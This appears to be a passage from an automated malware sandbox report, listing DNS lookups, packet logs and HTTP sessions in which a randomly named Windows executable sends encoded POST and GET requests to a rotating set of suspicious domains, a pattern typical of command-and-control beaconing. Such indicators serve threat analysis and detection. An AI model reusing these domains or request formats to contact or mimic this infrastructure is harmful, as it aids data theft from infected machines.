                                                                    Nov 12, 2024 18:50:01.990549088 CET5003680192.168.2.4104.21.4.93
                                                                    Nov 12, 2024 18:50:01.995697975 CET8050036104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:50:01.995874882 CET5003680192.168.2.4104.21.4.93
                                                                    Nov 12, 2024 18:50:02.005187988 CET5003680192.168.2.4104.21.4.93
                                                                    Nov 12, 2024 18:50:02.010715961 CET8050036104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:50:02.924303055 CET8050036104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:50:02.925530910 CET8050036104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:50:02.925585032 CET5003680192.168.2.4104.21.4.93
                                                                    Nov 12, 2024 18:50:03.518662930 CET5003680192.168.2.4104.21.4.93
                                                                    Nov 12, 2024 18:50:04.537678003 CET5003780192.168.2.4104.21.4.93
                                                                    Nov 12, 2024 18:50:04.543025017 CET8050037104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:50:04.543092012 CET5003780192.168.2.4104.21.4.93
                                                                    Nov 12, 2024 18:50:04.555982113 CET5003780192.168.2.4104.21.4.93
                                                                    Nov 12, 2024 18:50:04.560992002 CET8050037104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:50:04.561007023 CET8050037104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:50:04.561016083 CET8050037104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:50:04.561028004 CET8050037104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:50:04.561037064 CET8050037104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:50:04.561113119 CET8050037104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:50:04.561122894 CET8050037104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:50:04.561131001 CET8050037104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:50:04.561141014 CET8050037104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:50:05.474466085 CET8050037104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:50:05.476428032 CET8050037104.21.4.93192.168.2.4
                                                                    Nov 12, 2024 18:50:05.476478100 CET5003780192.168.2.4104.21.4.93
                                                                    Nov 12, 2024 18:50:06.409132004 CET5003780192.168.2.4104.21.4.93
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Nov 12, 2024 18:47:45.287169933 CET5900853192.168.2.41.1.1.1
                                                                    Nov 12, 2024 18:47:45.623090982 CET53590081.1.1.1192.168.2.4
                                                                    Nov 12, 2024 18:48:01.339469910 CET6356953192.168.2.41.1.1.1
                                                                    Nov 12, 2024 18:48:01.355490923 CET53635691.1.1.1192.168.2.4
                                                                    Nov 12, 2024 18:48:14.792143106 CET6102553192.168.2.41.1.1.1
                                                                    Nov 12, 2024 18:48:14.953794956 CET53610251.1.1.1192.168.2.4
                                                                    Nov 12, 2024 18:48:28.571721077 CET6081053192.168.2.41.1.1.1
                                                                    Nov 12, 2024 18:48:28.599922895 CET53608101.1.1.1192.168.2.4
                                                                    Nov 12, 2024 18:48:42.415400028 CET5143553192.168.2.41.1.1.1
                                                                    Nov 12, 2024 18:48:42.462253094 CET53514351.1.1.1192.168.2.4
                                                                    Nov 12, 2024 18:48:50.551559925 CET4956553192.168.2.41.1.1.1
                                                                    Nov 12, 2024 18:48:50.563182116 CET53495651.1.1.1192.168.2.4
                                                                    Nov 12, 2024 18:49:04.039165974 CET6543553192.168.2.41.1.1.1
                                                                    Nov 12, 2024 18:49:04.352847099 CET53654351.1.1.1192.168.2.4
                                                                    Nov 12, 2024 18:49:18.163832903 CET5395753192.168.2.41.1.1.1
                                                                    Nov 12, 2024 18:49:18.199767113 CET53539571.1.1.1192.168.2.4
                                                                    Nov 12, 2024 18:49:31.491574049 CET6117553192.168.2.41.1.1.1
                                                                    Nov 12, 2024 18:49:31.549094915 CET53611751.1.1.1192.168.2.4
                                                                    Nov 12, 2024 18:49:45.413805962 CET6314353192.168.2.41.1.1.1
                                                                    Nov 12, 2024 18:49:45.625206947 CET53631431.1.1.1192.168.2.4
                                                                    Nov 12, 2024 18:49:59.397672892 CET5829753192.168.2.41.1.1.1
                                                                    Nov 12, 2024 18:49:59.439289093 CET53582971.1.1.1192.168.2.4
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Nov 12, 2024 18:47:45.287169933 CET192.168.2.41.1.1.10x892fStandard query (0)www.bookingservice.centerA (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:48:01.339469910 CET192.168.2.41.1.1.10x195cStandard query (0)www.conansog.shopA (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:48:14.792143106 CET192.168.2.41.1.1.10x1a94Standard query (0)www.mycleanupfiesta.liveA (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:48:28.571721077 CET192.168.2.41.1.1.10x7321Standard query (0)www.43kdd.topA (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:48:42.415400028 CET192.168.2.41.1.1.10xe3aStandard query (0)www.darkvader.xyzA (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:48:50.551559925 CET192.168.2.41.1.1.10x25abStandard query (0)www.fitlook.shopA (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:49:04.039165974 CET192.168.2.41.1.1.10x2cc9Standard query (0)www.t19yd.topA (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:49:18.163832903 CET192.168.2.41.1.1.10xb322Standard query (0)www.qwibie.netA (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:49:31.491574049 CET192.168.2.41.1.1.10x760cStandard query (0)www.tempatmudisini06.clickA (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:49:45.413805962 CET192.168.2.41.1.1.10xe65Standard query (0)www.smirpox.xyzA (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:49:59.397672892 CET192.168.2.41.1.1.10xebe2Standard query (0)www.nonpressure.beautyA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Nov 12, 2024 18:47:45.623090982 CET1.1.1.1192.168.2.40x892fNo error (0)www.bookingservice.center98.124.224.17A (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:48:01.355490923 CET1.1.1.1192.168.2.40x195cNo error (0)www.conansog.shop104.21.41.74A (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:48:01.355490923 CET1.1.1.1192.168.2.40x195cNo error (0)www.conansog.shop172.67.162.12A (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:48:14.953794956 CET1.1.1.1192.168.2.40x1a94No error (0)www.mycleanupfiesta.live172.67.137.238A (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:48:14.953794956 CET1.1.1.1192.168.2.40x1a94No error (0)www.mycleanupfiesta.live104.21.38.192A (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:48:28.599922895 CET1.1.1.1192.168.2.40x7321No error (0)www.43kdd.top43kdd.topCNAME (Canonical name)IN (0x0001)false
                                                                    Nov 12, 2024 18:48:28.599922895 CET1.1.1.1192.168.2.40x7321No error (0)43kdd.top38.47.232.202A (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:48:42.462253094 CET1.1.1.1192.168.2.40xe3aServer failure (2)www.darkvader.xyznonenoneA (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:48:50.563182116 CET1.1.1.1192.168.2.40x25abNo error (0)www.fitlook.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:48:50.563182116 CET1.1.1.1192.168.2.40x25abNo error (0)www.fitlook.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:49:04.352847099 CET1.1.1.1192.168.2.40x2cc9No error (0)www.t19yd.topt19yd.topCNAME (Canonical name)IN (0x0001)false
                                                                    Nov 12, 2024 18:49:04.352847099 CET1.1.1.1192.168.2.40x2cc9No error (0)t19yd.top38.47.207.164A (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:49:18.199767113 CET1.1.1.1192.168.2.40xb322No error (0)www.qwibie.netqwibie.netCNAME (Canonical name)IN (0x0001)false
                                                                    Nov 12, 2024 18:49:18.199767113 CET1.1.1.1192.168.2.40xb322No error (0)qwibie.net3.33.130.190A (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:49:18.199767113 CET1.1.1.1192.168.2.40xb322No error (0)qwibie.net15.197.148.33A (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:49:31.549094915 CET1.1.1.1192.168.2.40x760cNo error (0)www.tempatmudisini06.clicktempatmudisini06.clickCNAME (Canonical name)IN (0x0001)false
                                                                    Nov 12, 2024 18:49:31.549094915 CET1.1.1.1192.168.2.40x760cNo error (0)tempatmudisini06.click103.21.221.4A (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:49:45.625206947 CET1.1.1.1192.168.2.40xe65No error (0)www.smirpox.xyz203.161.46.201A (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:49:59.439289093 CET1.1.1.1192.168.2.40xebe2No error (0)www.nonpressure.beauty104.21.4.93A (IP address)IN (0x0001)false
                                                                    Nov 12, 2024 18:49:59.439289093 CET1.1.1.1192.168.2.40xebe2No error (0)www.nonpressure.beauty172.67.131.229A (IP address)IN (0x0001)false
                                                                    • www.bookingservice.center
                                                                    • www.conansog.shop
                                                                    • www.mycleanupfiesta.live
                                                                    • www.43kdd.top
                                                                    • www.fitlook.shop
                                                                    • www.t19yd.top
                                                                    • www.qwibie.net
                                                                    • www.tempatmudisini06.click
                                                                    • www.smirpox.xyz
                                                                    • www.nonpressure.beauty
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.44973698.124.224.17804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:47:45.642328024 CET547OUTGET /rw0k/?SJLty=7Zsl8bAHqdkHEnH&C0oD=2O+BQtagKd2e0tCHf7cQEGpCdZEKMcu8KUvQppDq45CT9l+c4kN/Nkqe5cwEa/TPiwCfdT9AeaeBmqjtzD2yf/vyAaenMmGVr/csdah4RHR/FTYhQMTHjoI= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Host: www.bookingservice.center
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Nov 12, 2024 18:47:46.267258883 CET1236INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html
                                                                    Server: Microsoft-IIS/10.0
                                                                    X-Powered-By: ASP.NET
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Date: Tue, 12 Nov 2024 17:47:45 GMT
                                                                    Connection: close
                                                                    Content-Length: 1245
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                    Nov 12, 2024 18:47:46.267323017 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                    Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.449758104.21.41.74804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:48:01.374057055 CET800OUTPOST /4y21/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.conansog.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 201
                                                                    Connection: close
                                                                    Origin: http://www.conansog.shop
                                                                    Referer: http://www.conansog.shop/4y21/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 72 4e 35 73 79 56 32 59 71 46 42 46 53 64 2f 7a 36 46 6b 67 43 55 44 39 46 50 64 78 42 55 4c 32 69 6d 76 69 4e 74 76 37 39 67 5a 43 65 79 44 4c 4e 44 52 4c 76 54 49 36 36 4c 4c 6c 45 76 70 66 47 48 66 69 6e 34 73 4a 69 73 74 67 42 76 41 78 6e 38 2b 7a 57 77 35 78 43 79 2f 70 38 6c 49 42 62 74 61 66 30 77 4d 43 79 44 35 39 63 58 46 44 6f 42 6e 6b 35 54 68 53 75 59 77 45 31 31 4f 4c 6f 30 53 70 31 37 48 35 4d 57 71 47 6b 76 47 45 30 34 71 4c 35 67 64 39 59 62 6d 44 54 75 76 58 78 78 4d 41 68 6e 46 54 63 51 74 43 73 46 75 37 67 38 38 55 4d 30 51 61 4e 41 37 33 4f 78 43 51 59 67 3d 3d
                                                                    Data Ascii: C0oD=rN5syV2YqFBFSd/z6FkgCUD9FPdxBUL2imviNtv79gZCeyDLNDRLvTI66LLlEvpfGHfin4sJistgBvAxn8+zWw5xCy/p8lIBbtaf0wMCyD59cXFDoBnk5ThSuYwE11OLo0Sp17H5MWqGkvGE04qL5gd9YbmDTuvXxxMAhnFTcQtCsFu7g88UM0QaNA73OxCQYg==
                                                                    Nov 12, 2024 18:48:02.074147940 CET746INHTTP/1.1 404 Not Found
                                                                    Date: Tue, 12 Nov 2024 17:48:01 GMT
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w3CLJ0OUc0gVY5HDmMZJNhjUcM5XcwVSIWPy6%2F1rbEpGeusG4hWG2vbb%2F8hwK%2FO5bo8%2BobPHJc5L69vwu8SOA4tGeTT9PXBjGG6lMKJzVBiLmhqHE%2FtC6W5aIdGg%2FJ8%2FJMPcug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8e1859bfda7f3458-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1155&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=800&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.449770104.21.41.74804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:48:03.916635036 CET820OUTPOST /4y21/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.conansog.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 221
                                                                    Connection: close
                                                                    Origin: http://www.conansog.shop
                                                                    Referer: http://www.conansog.shop/4y21/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 72 4e 35 73 79 56 32 59 71 46 42 46 54 2b 58 7a 39 57 38 67 45 30 44 36 42 2f 64 78 4c 30 4c 79 69 6d 6a 69 4e 76 44 56 39 53 4e 43 65 51 62 4c 4d 43 52 4c 73 54 49 36 31 72 4b 76 4b 50 70 57 47 48 44 71 6e 35 41 4a 69 76 52 67 42 71 6b 78 6d 4b 32 77 55 67 35 7a 5a 43 2f 72 7a 46 49 42 62 74 61 66 30 77 49 34 79 44 78 39 63 6e 31 44 70 6b 4c 6a 6c 44 68 64 35 6f 77 45 69 6c 4f 48 6f 30 54 36 31 35 69 78 4d 56 53 47 6b 75 32 45 30 70 71 49 7a 67 63 32 58 37 6e 56 43 4f 65 6e 70 41 42 73 70 55 52 4c 62 69 59 69 6b 6a 6a 68 78 4e 64 44 65 30 30 70 51 48 79 44 44 79 2f 5a 44 71 30 75 67 7a 42 4c 64 48 36 4c 79 49 50 4a 51 36 73 2f 6d 46 67 3d
                                                                    Data Ascii: C0oD=rN5syV2YqFBFT+Xz9W8gE0D6B/dxL0LyimjiNvDV9SNCeQbLMCRLsTI61rKvKPpWGHDqn5AJivRgBqkxmK2wUg5zZC/rzFIBbtaf0wI4yDx9cn1DpkLjlDhd5owEilOHo0T615ixMVSGku2E0pqIzgc2X7nVCOenpABspURLbiYikjjhxNdDe00pQHyDDy/ZDq0ugzBLdH6LyIPJQ6s/mFg=
                                                                    Nov 12, 2024 18:48:04.622538090 CET738INHTTP/1.1 404 Not Found
                                                                    Date: Tue, 12 Nov 2024 17:48:04 GMT
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nQoUtzXmkMuEuSgf4Ndqrlr7vwxISkQaQIBFJOmUfWhawfwTYMcE1m4Ha6M13tyf3%2Fw%2FBSku6cfhlOBnwDmaRoL9fXhyU%2FS5HsUVB24WHSnPw3Pnr6hZlU0kjENTpmDKpkIMCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8e1859cfcb300c46-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2039&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=820&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.449782104.21.41.74804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:48:06.506959915 CET10902OUTPOST /4y21/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.conansog.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 10301
                                                                    Connection: close
                                                                    Origin: http://www.conansog.shop
                                                                    Referer: http://www.conansog.shop/4y21/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 72 4e 35 73 79 56 32 59 71 46 42 46 54 2b 58 7a 39 57 38 67 45 30 44 36 42 2f 64 78 4c 30 4c 79 69 6d 6a 69 4e 76 44 56 39 53 56 43 65 44 54 4c 4e 68 4a 4c 74 54 49 36 34 4c 4b 73 4b 50 6f 45 47 48 62 75 6e 35 64 38 69 70 64 67 41 49 73 78 79 76 57 77 65 67 35 7a 52 69 2f 71 38 6c 4a 5a 62 73 32 44 30 77 59 34 79 44 78 39 63 6c 74 44 34 78 6e 6a 6e 44 68 53 75 59 77 49 31 31 4f 6a 6f 30 4c 71 31 35 6e 54 4e 6b 79 47 6b 4f 6d 45 79 62 43 49 2f 67 63 30 55 37 6e 64 43 4f 53 34 70 45 68 57 70 56 56 78 62 68 45 69 6e 58 43 66 76 65 4e 69 4b 58 45 50 4c 6c 43 44 47 69 48 70 61 39 77 4a 32 6a 74 43 4e 32 61 6c 32 49 2b 38 4b 70 59 38 78 69 35 72 78 54 53 41 56 52 70 50 4c 75 4e 50 39 35 32 43 67 2f 72 4f 72 39 6b 64 57 74 39 76 30 62 51 66 45 2b 65 4d 50 69 52 54 59 79 44 77 4f 5a 71 63 67 38 67 4c 50 4d 2f 57 49 69 74 49 2b 63 69 33 56 6d 70 75 4c 56 76 6e 48 62 6e 2f 71 76 58 48 71 48 53 77 32 2b 78 2f 76 4a 69 75 51 41 68 48 47 37 54 33 72 56 39 62 39 55 77 66 76 6c 6f 78 47 36 61 74 59 [TRUNCATED]
                                                                    Data Ascii: C0oD=rN5syV2YqFBFT+Xz9W8gE0D6B/dxL0LyimjiNvDV9SVCeDTLNhJLtTI64LKsKPoEGHbun5d8ipdgAIsxyvWweg5zRi/q8lJZbs2D0wY4yDx9cltD4xnjnDhSuYwI11Ojo0Lq15nTNkyGkOmEybCI/gc0U7ndCOS4pEhWpVVxbhEinXCfveNiKXEPLlCDGiHpa9wJ2jtCN2al2I+8KpY8xi5rxTSAVRpPLuNP952Cg/rOr9kdWt9v0bQfE+eMPiRTYyDwOZqcg8gLPM/WIitI+ci3VmpuLVvnHbn/qvXHqHSw2+x/vJiuQAhHG7T3rV9b9UwfvloxG6atYy2kNwfklDWgjK14KH5J10W5C+npIwQXU4uBDt05UI8Ba/+XoU/AMRhtDFBa5WEyBYw6MAsYlg0qd3tH4hOoMQOtxqABq+fDm9azysLoHHY2QiyZr7ghBr2REtSX9x2k+YRwb6TyTPenkGdp2GmhDkzwm5SDJ3jGIOTiCPELd0KItLAzYmVhNFP6/8m4QtS23j0tkTdsc2CYyyXk7CpckMLBWGazp/zWmBWlA4uyKdzoiXUTWGyExWWT08VdIk1agjG7MLylNqDLGnMcpFLPd/ubB5/BxUnC5UTQytTUFJf6+8gAyN826lvtfdQ7vj6vRX78oYjJJtPO1WHX8MT94H9z4zG1LOLqucqPq16p5B53ZbQMMu+mxa/pwviheiNDAI39yczAN20+KwT4IDlrZowk8L1UHNA+KC6PF/oYQQa3GT4t0dvUtuBU/N1hn/7w6DXTMsQ7deqQMGAdGxhZt0GqqUf0trpu2eMfuvnWeuD541J013MUrYpb192gt8OFUmqdgt0v5jiiFyFTmgPRkElrPyPdvIFuPDspJvuplhNp6UUuLLADSruWoI3HCznX9asc2LD6js9WwV/IJJ6aHc6roKrSXf2G3Ow7eK8J7nS4q1Svlc3q7FeQ4Na1yZ8tUTNTjQ4YH00PpY18u82KEa1Yp7cBcADvQjw [TRUNCATED]
                                                                    Nov 12, 2024 18:48:07.190120935 CET739INHTTP/1.1 404 Not Found
                                                                    Date: Tue, 12 Nov 2024 17:48:07 GMT
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LDP2uDL1bZdWPwl7zzgzJcvsXJg%2Fw%2FVI5KLgb8RCnsck542VVTfYncJE1r3EJKd40c7HGxAbv8g5G1bYUJdQF4nZSc8iUgCV61lxiVpYja4EvlVjdyHR6F6P7vUP0d2OCp3QDA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8e1859dfdf1f0b9d-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1647&sent=3&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10902&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.449798104.21.41.74804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:48:09.053576946 CET539OUTGET /4y21/?C0oD=mPRMxh+e+VE7Ove39Sw8dmi+aOJGAWH5jFedH8atyVdfIyLeJFBfjy5Y1KL2B+s6BQDtsLRij94DPPI3pu69UR9kCgLa8mV6DaG1kiIWnyUqRHhlgCWSgg4=&SJLty=7Zsl8bAHqdkHEnH HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Host: www.conansog.shop
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Nov 12, 2024 18:48:09.773437977 CET740INHTTP/1.1 404 Not Found
                                                                    Date: Tue, 12 Nov 2024 17:48:09 GMT
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LSq2TXNm8EycivJra0fCEN0WzUcvAVuK4JgmyuNGkJYA%2FjOBWR8qnzdGApx5U6staJ%2BRaM9JrObjGbj0seCfRjQJdL32DOrKtGm9VZiGdNPQIIzIqJpAKmV%2FvQcV8%2Fe1ulmJQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8e1859efdd623064-DFW
                                                                    alt-svc: h3=":443"; ma=86400
